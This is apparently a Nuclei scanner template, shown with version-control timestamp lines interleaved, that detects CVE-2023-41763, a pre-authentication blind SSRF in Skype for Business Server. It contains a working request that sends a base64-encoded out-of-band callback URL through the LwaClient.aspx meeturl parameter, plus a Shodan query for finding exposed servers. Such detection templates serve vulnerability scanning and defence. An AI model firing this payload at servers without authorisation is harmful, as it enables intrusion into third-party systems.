2023-12-19 14:24:59 +00:00
|
|
|
id: CVE-2023-41763
|
2023-07-19 16:55:04 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery
|
|
|
|
author: hateshape
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability
|
|
|
|
reference:
|
|
|
|
- https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html
|
2023-12-19 14:24:59 +00:00
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-41763
|
2024-03-23 09:28:19 +00:00
|
|
|
- https://github.com/Ostorlab/KEV
|
|
|
|
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
|
2024-01-14 13:49:27 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
|
|
cvss-score: 5.3
|
|
|
|
cve-id: CVE-2023-41763
|
2024-03-23 09:28:19 +00:00
|
|
|
epss-score: 0.05631
|
|
|
|
epss-percentile: 0.93128
|
2024-01-14 13:49:27 +00:00
|
|
|
cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:*
|
2023-07-19 16:55:04 +00:00
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
2024-01-14 13:49:27 +00:00
|
|
|
vendor: microsoft
|
|
|
|
product: skype_for_business_server
|
2023-10-14 11:27:55 +00:00
|
|
|
shodan-query: html:"Skype for Business"
|
2024-01-14 13:49:27 +00:00
|
|
|
tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev
|
2023-07-19 16:55:04 +00:00
|
|
|
variables:
|
|
|
|
ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//"
|
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
|
|
words:
|
|
|
|
- "dns"
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'Skype'
|
2024-01-14 14:05:19 +00:00
|
|
|
# digest: 490a0046304402200dec9504eba00a00b9faf7f3cb827a0a77f3f13912088b815d6796b88719b8a302200cb64ac27096ce55753e32cc47ccbaa266e9bce795b3c10f73a288cfd6590d77:922c64590222798bb761d5b6d8e72950
|